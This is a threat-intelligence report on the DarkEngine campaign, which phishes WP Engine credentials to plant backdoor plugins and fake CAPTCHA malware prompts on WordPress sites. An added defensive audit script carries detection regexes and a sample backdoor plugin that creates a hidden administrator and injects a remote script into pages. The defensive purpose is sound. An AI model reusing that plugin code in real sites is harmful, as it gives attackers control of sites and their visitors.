DarkEngine: CyberCX Uncovers Highly Orchestrated WordPress Phishing Campaign

Published by Digital Forensics and Incident Response (DFIR) and Cyber Intelligence on June 3, 2025
Primary authors: Liam Wilkinson, DFIR and Thomas McIntyre, Cyber Intelligence
CyberCX has uncovered a highly orchestrated phishing campaign designed to harvest credentials from WP Engine users to compromise managed WordPress websites at scale. The campaign uses search engine optimisation (SEO) poisoning to target WP Engine, a popular web hosting platform used by businesses to manage multiple WordPress websites from a single portal.
The campaign, which CyberCX has dubbed DarkEngine, infects the compromised WordPress websites with a backdoor plugin and malicious scripts that embed fake CAPTCHA prompts in the site's pages, leading to the delivery of malware to visitors. The fake CAPTCHA prompts are associated with the Yet Another NodeJS Backdoor (YaNB)[1], KongTuke, LandUpdate808 (also referred to as UNC5518), and TAG-124[2] activity clusters.
CyberCX has identified at least 2,353 unique websites potentially compromised by this threat actor, 82 of which belong to Australian and New Zealand organisations, and at least 28 WP Engine credentials captured by the phishing infrastructure (the true number is likely to be significantly higher). CyberCX Intelligence has proactively notified these organisations as part of our efforts to secure our communities.
CyberCX notes that this campaign is ongoing and that the threat actor may change the indicators mentioned in this report in response to exposure, consistent with its known tradecraft.
Key Points
- CyberCX has discovered a highly orchestrated phishing campaign compromising WordPress websites managed through WP Engine. The campaign, which we have dubbed DarkEngine, has been active since at least June 2024 and enables threat actors to deliver malware to website visitors by embedding fake CAPTCHA prompts in legitimate websites.
- The fake CAPTCHA prompts observed in DarkEngine are a variation of ClickFix, a social engineering technique designed to manipulate users into running malicious commands.
- Execution of ClickFix commands by website visitors commonly leads to the deployment of information stealer or remote access trojan (RAT) malware, including Lumma Stealer, DanaBot, AsyncRAT, NetSupport RAT and DarkGate[3], which can result in compromise of individuals and organisations.
- Targeting WP Engine allows the threat actor to scale its malicious activities. By gaining access to all sites managed under a WP Engine account, rather than targeting websites individually, the threat actor can compromise dozens or potentially hundreds of hosted WordPress sites with each attack.
- Businesses commonly use WP Engine as a central portal to access and manage multiple WordPress websites. In particular, marketing and Search Engine Optimisation (SEO) companies use it to manage websites on behalf of third parties, so a single compromised account can expose many unrelated organisations.
- So far, CyberCX has identified at least 2,353 unique websites[4] likely compromised by this threat actor, 82 of which belong to Australian and New Zealand organisations.
- The DarkEngine campaign involves a multi-stage approach, indicating a level of resource investment that we would associate with a capable, financially motivated threat actor.
- The threat actor has created replica clones of the WP Engine website in order to steal WP Engine login credentials. The replicas can be distinguished from the legitimate site only by their URL, although over time they have also shown errors such as website elements failing to load properly.
- The threat actor uses SEO poisoning and Google sponsored advertisements to place phishing links above the legitimate WP Engine URL in search results, directing users to the impersonated website.
- Using the stolen credentials to act as the WP Engine user, the threat actor installs a backdoor plugin on the hosted WordPress sites. The plugin gives the threat actor administrator access and the ability to inject malicious scripts, which deliver malware to website visitors through fake CAPTCHA prompts.
- CyberCX assesses that DarkEngine is likely a financially motivated malware distribution operation that distributes malware on behalf of other threat actors or sells access to compromised systems.
- Similar activity clusters, such as LandUpdate808 and TAG-124, have been associated with a range of threat actors including Rhysida ransomware, Interlock ransomware, SocGholish, and Asylum Ambuscade operators.[5]
- CyberCX Intelligence has been proactively notifying organisations across Australia and New Zealand whose websites have been affected, as part of our efforts to secure our communities. We advise all organisations using WP Engine and WordPress to search for activity related to the DarkEngine campaign and to secure their WP Engine accounts and websites.
- Organisations using WP Engine should audit their account activity for unexpected logins on WP Engine and unexpected plugins in WordPress.
- Organisations should also educate staff and end-users about how to spot ClickFix techniques like fake CAPTCHA.
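The plugin audit recommended above can be partly automated. The following script is an added example, not code from the CyberCX report or from WP Engine: it walks a WordPress `wp-content/plugins` directory, flags any plugin slug that is not on a site-owner allowlist, and scans each plugin's PHP for traits common to backdoor plugins (silently creating a user and granting it the administrator role, injecting a `<script>` tag into every page via the `wp_head`/`wp_footer` hooks, obfuscated `eval(base64_decode(...))` execution, and hiding from the plugin list via the `all_plugins` filter). The heuristics and the allowlist are generic assumptions for the example, not indicators from the DarkEngine report, and the three sample plugins are constructed inline so the script runs offline.

```python
"""
Audit a WordPress wp-content/plugins tree for plugins that are not on an
allowlist and for source-level traits common to backdoor plugins.

The heuristics below are generic WordPress backdoor patterns assumed for this
example, not indicators from the DarkEngine report. The sample plugins are
constructed here so the script runs stand-alone.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field

# Plugins the site owner expects to find (an assumption for the example).
ALLOWLIST = {"akismet", "hello"}

# (name, regex) pairs applied to each plugin's PHP source.
HEURISTICS = [
    ("creates-user", re.compile(r"\bwp_(?:create|insert)_user\s*\(", re.I)),
    ("grants-admin", re.compile(
        r"set_role\s*\(\s*['\"]administrator['\"]|['\"]role['\"]\s*=>\s*['\"]administrator", re.I)),
    # add_action('wp_head'|'wp_footer', ...) followed shortly by an echoed <script tag
    ("injects-script", re.compile(
        r"add_action\s*\(\s*['\"]wp_(?:head|footer)['\"][\s\S]{0,400}?<script", re.I)),
    ("obfuscated-exec", re.compile(
        r"\b(?:eval|assert|create_function)\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\b", re.I)),
    ("hides-from-plugin-list", re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]", re.I)),
]


@dataclass
class Finding:
    slug: str
    allowlisted: bool
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Anything unexpected, or anything expected that still trips a heuristic.
        return not self.allowlisted or bool(self.hits)


def _php_sources(path):
    """Yield the text of every .php file under path (a file or a directory)."""
    paths = [path] if os.path.isfile(path) else [
        os.path.join(d, f) for d, _, fs in os.walk(path) for f in fs]
    for p in paths:
        if p.endswith(".php"):
            with open(p, encoding="utf-8", errors="replace") as fh:
                yield fh.read()


def audit_plugins(plugins_dir, allowlist=ALLOWLIST):
    """Return one Finding per plugin slug found directly under plugins_dir."""
    findings = []
    for entry in sorted(os.listdir(plugins_dir)):
        path = os.path.join(plugins_dir, entry)
        if os.path.isdir(path):
            slug = entry                # directory plugin, e.g. akismet/akismet.php
        elif entry.endswith(".php"):
            slug = entry[:-4]           # single-file plugin, e.g. hello.php
        else:
            continue
        hits = []
        for src in _php_sources(path):
            for name, rx in HEURISTICS:
                if name not in hits and rx.search(src):
                    hits.append(name)
        findings.append(Finding(slug, slug in allowlist, hits))
    return findings


# Constructed sample plugins: two benign, one with backdoor traits.
BENIGN_PLUGIN = "<?php\n/* Plugin Name: Akismet */\nadd_action('init', 'akismet_init');\nfunction akismet_init() { /* nothing of interest */ }\n"
HELLO_PLUGIN = "<?php\n/* Plugin Name: Hello Dolly */\nfunction hello_dolly() { echo 'Hello'; }\n"
BACKDOOR_PLUGIN = """<?php
/* Plugin Name: WP Cache Helper */
add_action('init', 'wch_init');
function wch_init() {
    // Quietly add a second administrator the site owner never created.
    if (!username_exists('wpsupport')) {
        $id = wp_create_user('wpsupport', 'changeme', 'support@example.invalid');
        (new WP_User($id))->set_role('administrator');
    }
}
add_action('wp_head', 'wch_head');
function wch_head() {
    // Inject a remote script into every page served to visitors.
    echo '<script src="https://cdn.example.invalid/check.js"></script>';
}
"""


def build_sample_site(root):
    """Write the constructed wp-content/plugins tree under root; return its path."""
    plugins = os.path.join(root, "wp-content", "plugins")
    os.makedirs(os.path.join(plugins, "akismet"))
    os.makedirs(os.path.join(plugins, "wp-cache-helper"))
    with open(os.path.join(plugins, "akismet", "akismet.php"), "w") as fh:
        fh.write(BENIGN_PLUGIN)
    with open(os.path.join(plugins, "hello.php"), "w") as fh:
        fh.write(HELLO_PLUGIN)
    with open(os.path.join(plugins, "wp-cache-helper", "wp-cache-helper.php"), "w") as fh:
        fh.write(BACKDOOR_PLUGIN)
    return plugins


def audit_sample_site():
    """Build the constructed site in a temp dir, audit it, and return findings by slug."""
    with tempfile.TemporaryDirectory() as tmp:
        return {f.slug: f for f in audit_plugins(build_sample_site(tmp))}


if __name__ == "__main__":
    for f in audit_sample_site().values():
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{flag:10} {f.slug:18} allowlisted={f.allowlisted} hits={f.hits}")
```

Point `audit_plugins()` at a real `wp-content/plugins` directory and populate `ALLOWLIST` from a known-good inventory of the site. Treat a hit as a reason to read the plugin's source, not as proof of compromise; the same check should be paired with a review of WordPress user accounts with the administrator role and of the WP Engine portal's login history, since the backdoor plugin is installed only after the account credentials have been phished.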
[1] https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/
[2] https://www.recordedfuture.com/research/tag-124-multi-layered-tds-infrastructure-extensive-user-base
[3] https://www.logpoint.com/en/blog/emerging-threats/clickfix-another-deceptive-social-engineering-technique
[4] This figure was sourced from data obtained from threat actor infrastructure. Due to the historic nature of some of this data, CyberCX is unable to guarantee that all identified websites were compromised.
[5] https://www.recordedfuture.com/research/tag-124-multi-layered-tds-infrastructure-extensive-user-base